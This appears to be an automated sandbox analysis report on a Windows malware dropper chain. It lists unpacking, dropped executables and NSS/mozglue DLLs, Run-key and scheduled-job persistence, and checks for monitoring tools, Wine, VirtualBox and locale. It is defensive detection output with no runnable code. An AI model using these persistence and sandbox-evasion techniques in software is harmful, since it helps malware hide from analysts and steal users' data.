Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: 6SoKuOqyNh.exe

Static PE information: Raw size of axajwlnp is bigger than: 0x100000 < 0x197400

Source:	Binary string: mozglue.pdbP source: bfb8bb0dc7.exe, 0000000B.00000002.3127973139.000000006C6BD000.00000002.00000001.01000000.00000015.sdmp
Source:	Binary string: freebl3.pdb source: freebl3.dll.11.dr
Source:	Binary string: freebl3.pdbp source: freebl3.dll.11.dr
Source:	Binary string: nss3.pdb@ source: bfb8bb0dc7.exe, 0000000B.00000002.3130539225.000000006C87F000.00000002.00000001.01000000.00000014.sdmp, nss3[1].dll.11.dr
Source:	Binary string: z:\task_1551543573\build\openh264\gmpopenh264.pdbV source: firefox.exe, 00000016.00000003.3426978382.0000018948100000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: softokn3.pdb@ source: softokn3.dll.11.dr
Source:	Binary string: z:\task_1551543573\build\openh264\gmpopenh264.pdb source: firefox.exe, 00000016.00000003.3426978382.0000018948100000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.11.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.11.dr, msvcp140.dll.11.dr
Source:	Binary string: nss3.pdb source: bfb8bb0dc7.exe, 0000000B.00000002.3130539225.000000006C87F000.00000002.00000001.01000000.00000014.sdmp, nss3[1].dll.11.dr
Source:	Binary string: mozglue.pdb source: bfb8bb0dc7.exe, 0000000B.00000002.3127973139.000000006C6BD000.00000002.00000001.01000000.00000015.sdmp
Source:	Binary string: softokn3.pdb source: softokn3.dll.11.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	Unpacked PE file: 2.2.6SoKuOqyNh.exe.9f0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;axajwlnp:EW;ubpicycu:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;axajwlnp:EW;ubpicycu:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Unpacked PE file: 4.2.explorti.exe.e10000.0.unpack :EW;.rsrc:W;.idata :W; :EW;axajwlnp:EW;ubpicycu:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;axajwlnp:EW;ubpicycu:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Unpacked PE file: 5.2.explorti.exe.e10000.0.unpack :EW;.rsrc:W;.idata :W; :EW;axajwlnp:EW;ubpicycu:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;axajwlnp:EW;ubpicycu:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Unpacked PE file: 11.2.bfb8bb0dc7.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.fiti:R;.jotibe:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Unpacked PE file: 36.2.bfb8bb0dc7.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.fiti:R;.jotibe:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Unpacked PE file: 47.2.RoamingFHJDBKJKFI.exe.ca0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;wfabfqoe:EW;qxvdwait:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;wfabfqoe:EW;qxvdwait:EW;.taggant:EW;
Source: C:\Users\user\AppData\RoamingHJKECAAAFH.exe	Unpacked PE file: 50.2.RoamingHJKECAAAFH.exe.830000.0.unpack :EW;.rsrc:W;.idata :W; :EW;axajwlnp:EW;ubpicycu:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;axajwlnp:EW;ubpicycu:EW;.taggant:EW;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Unpacked PE file: 11.2.bfb8bb0dc7.exe.400000.0.unpack
Source: C:\Users\user\1000003002\d27375200a.exe	Unpacked PE file: 12.2.d27375200a.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Unpacked PE file: 36.2.bfb8bb0dc7.exe.400000.0.unpack
Source: C:\Users\user\1000003002\d27375200a.exe	Unpacked PE file: 37.2.d27375200a.exe.400000.0.unpack

Yara detected Babadeda

Source: Yara match	File source: 37.2.d27375200a.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.d27375200a.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 37.0.d27375200a.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.d27375200a.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\1000003002\d27375200a.exe, type: DROPPED

Contains functionality to dynamically determine API calls

Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe

Code function: 11_2_004195E0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

11_2_004195E0

Entry point lies outside standard sections

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

PE file contains an invalid checksum

Source: random[1].exe.11.dr	Static PE information: real checksum: 0x1caa78 should be: 0x1d70b3
Source: RoamingHJKECAAAFH.exe.11.dr	Static PE information: real checksum: 0x1d42cd should be: 0x1d31a3
Source: 6SoKuOqyNh.exe	Static PE information: real checksum: 0x1d42cd should be: 0x1d31a3
Source: explorti.exe.2.dr	Static PE information: real checksum: 0x1d42cd should be: 0x1d31a3
Source: d27375200a.exe.10.dr	Static PE information: real checksum: 0x0 should be: 0x1fa44
Source: random[1].exe0.10.dr	Static PE information: real checksum: 0x0 should be: 0x1fa44
Source: RoamingFHJDBKJKFI.exe.11.dr	Static PE information: real checksum: 0x1caa78 should be: 0x1d70b3
Source: axplong.exe.47.dr	Static PE information: real checksum: 0x1caa78 should be: 0x1d70b3
Source: enter[1].exe.11.dr	Static PE information: real checksum: 0x1d42cd should be: 0x1d31a3

PE file contains sections with non-standard names

Source: 6SoKuOqyNh.exe	Static PE information: section name:
Source: 6SoKuOqyNh.exe	Static PE information: section name: .idata
Source: 6SoKuOqyNh.exe	Static PE information: section name:
Source: 6SoKuOqyNh.exe	Static PE information: section name: axajwlnp
Source: 6SoKuOqyNh.exe	Static PE information: section name: ubpicycu
Source: 6SoKuOqyNh.exe	Static PE information: section name: .taggant
Source: explorti.exe.2.dr	Static PE information: section name:
Source: explorti.exe.2.dr	Static PE information: section name: .idata
Source: explorti.exe.2.dr	Static PE information: section name:
Source: explorti.exe.2.dr	Static PE information: section name: axajwlnp
Source: explorti.exe.2.dr	Static PE information: section name: ubpicycu
Source: explorti.exe.2.dr	Static PE information: section name: .taggant
Source: random[1].exe.10.dr	Static PE information: section name: .fiti
Source: random[1].exe.10.dr	Static PE information: section name: .jotibe
Source: bfb8bb0dc7.exe.10.dr	Static PE information: section name: .fiti
Source: bfb8bb0dc7.exe.10.dr	Static PE information: section name: .jotibe
Source: random[1].exe0.10.dr	Static PE information: section name: .code
Source: d27375200a.exe.10.dr	Static PE information: section name: .code
Source: random[1].exe.11.dr	Static PE information: section name:
Source: random[1].exe.11.dr	Static PE information: section name: .idata
Source: random[1].exe.11.dr	Static PE information: section name:
Source: random[1].exe.11.dr	Static PE information: section name: wfabfqoe
Source: random[1].exe.11.dr	Static PE information: section name: qxvdwait
Source: random[1].exe.11.dr	Static PE information: section name: .taggant
Source: enter[1].exe.11.dr	Static PE information: section name:
Source: enter[1].exe.11.dr	Static PE information: section name: .idata
Source: enter[1].exe.11.dr	Static PE information: section name:
Source: enter[1].exe.11.dr	Static PE information: section name: axajwlnp
Source: enter[1].exe.11.dr	Static PE information: section name: ubpicycu
Source: enter[1].exe.11.dr	Static PE information: section name: .taggant
Source: RoamingHJKECAAAFH.exe.11.dr	Static PE information: section name:
Source: RoamingHJKECAAAFH.exe.11.dr	Static PE information: section name: .idata
Source: RoamingHJKECAAAFH.exe.11.dr	Static PE information: section name:
Source: RoamingHJKECAAAFH.exe.11.dr	Static PE information: section name: axajwlnp
Source: RoamingHJKECAAAFH.exe.11.dr	Static PE information: section name: ubpicycu
Source: RoamingHJKECAAAFH.exe.11.dr	Static PE information: section name: .taggant
Source: freebl3.dll.11.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.11.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.11.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.11.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.11.dr	Static PE information: section name: .didat
Source: msvcp140[1].dll.11.dr	Static PE information: section name: .didat
Source: nss3.dll.11.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.11.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.11.dr	Static PE information: section name: .00cfg
Source: softokn3[1].dll.11.dr	Static PE information: section name: .00cfg
Source: RoamingFHJDBKJKFI.exe.11.dr	Static PE information: section name:
Source: RoamingFHJDBKJKFI.exe.11.dr	Static PE information: section name: .idata
Source: RoamingFHJDBKJKFI.exe.11.dr	Static PE information: section name:
Source: RoamingFHJDBKJKFI.exe.11.dr	Static PE information: section name: wfabfqoe
Source: RoamingFHJDBKJKFI.exe.11.dr	Static PE information: section name: qxvdwait
Source: RoamingFHJDBKJKFI.exe.11.dr	Static PE information: section name: .taggant
Source: axplong.exe.47.dr	Static PE information: section name:
Source: axplong.exe.47.dr	Static PE information: section name: .idata
Source: axplong.exe.47.dr	Static PE information: section name:
Source: axplong.exe.47.dr	Static PE information: section name: wfabfqoe
Source: axplong.exe.47.dr	Static PE information: section name: qxvdwait
Source: axplong.exe.47.dr	Static PE information: section name: .taggant

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_0041A9F5 push ecx; ret		11_2_0041AA08
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C67B536 push ecx; ret		11_2_6C67B549

Source: 6SoKuOqyNh.exe	Static PE information: section name: entropy: 7.9818006822367735
Source: 6SoKuOqyNh.exe	Static PE information: section name: axajwlnp entropy: 7.954626720251567
Source: explorti.exe.2.dr	Static PE information: section name: entropy: 7.9818006822367735
Source: explorti.exe.2.dr	Static PE information: section name: axajwlnp entropy: 7.954626720251567
Source: random[1].exe.10.dr	Static PE information: section name: .text entropy: 7.823853344462366
Source: bfb8bb0dc7.exe.10.dr	Static PE information: section name: .text entropy: 7.823853344462366
Source: random[1].exe.11.dr	Static PE information: section name: entropy: 7.982589984423413
Source: random[1].exe.11.dr	Static PE information: section name: wfabfqoe entropy: 7.954564972616457
Source: enter[1].exe.11.dr	Static PE information: section name: entropy: 7.9818006822367735
Source: enter[1].exe.11.dr	Static PE information: section name: axajwlnp entropy: 7.954626720251567
Source: RoamingHJKECAAAFH.exe.11.dr	Static PE information: section name: entropy: 7.9818006822367735
Source: RoamingHJKECAAAFH.exe.11.dr	Static PE information: section name: axajwlnp entropy: 7.954626720251567
Source: RoamingFHJDBKJKFI.exe.11.dr	Static PE information: section name: entropy: 7.982589984423413
Source: RoamingFHJDBKJKFI.exe.11.dr	Static PE information: section name: wfabfqoe entropy: 7.954564972616457
Source: axplong.exe.47.dr	Static PE information: section name: entropy: 7.982589984423413
Source: axplong.exe.47.dr	Static PE information: section name: wfabfqoe entropy: 7.954564972616457

Drops PE files

Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File created: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\enter[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File created: C:\Users\user\1000003002\d27375200a.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File created: C:\Users\user\AppData\RoamingHJKECAAAFH.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File created: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	File created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Jump to dropped file
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	File created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Drops PE files to the application program directory (C:\ProgramData)

Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Boot Survival

Creates multiple autostart registry keys

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run bfb8bb0dc7.exe			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run d27375200a.exe			Jump to behavior

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\RoamingHJKECAAAFH.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\RoamingHJKECAAAFH.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\RoamingHJKECAAAFH.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\RoamingHJKECAAAFH.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\RoamingHJKECAAAFH.exe	Window searched: window name: PROCMON_WINDOW_CLASS

Creates job files (autostart)

Source: C:\Users\user\Desktop\6SoKuOqyNh.exe

File created: C:\Windows\Tasks\explorti.job

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run bfb8bb0dc7.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run bfb8bb0dc7.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run d27375200a.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run d27375200a.exe	Jump to behavior

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe

11_2_004195E0

Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\1000003002\d27375200a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\1000003002\d27375200a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\1000003002\d27375200a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\1000003002\d27375200a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\1000003002\d27375200a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\1000003002\d27375200a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking locale)

Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\RoamingHJKECAAAFH.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\RoamingHJKECAAAFH.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__

Tries to detect virtualization through RDTSC time measurements

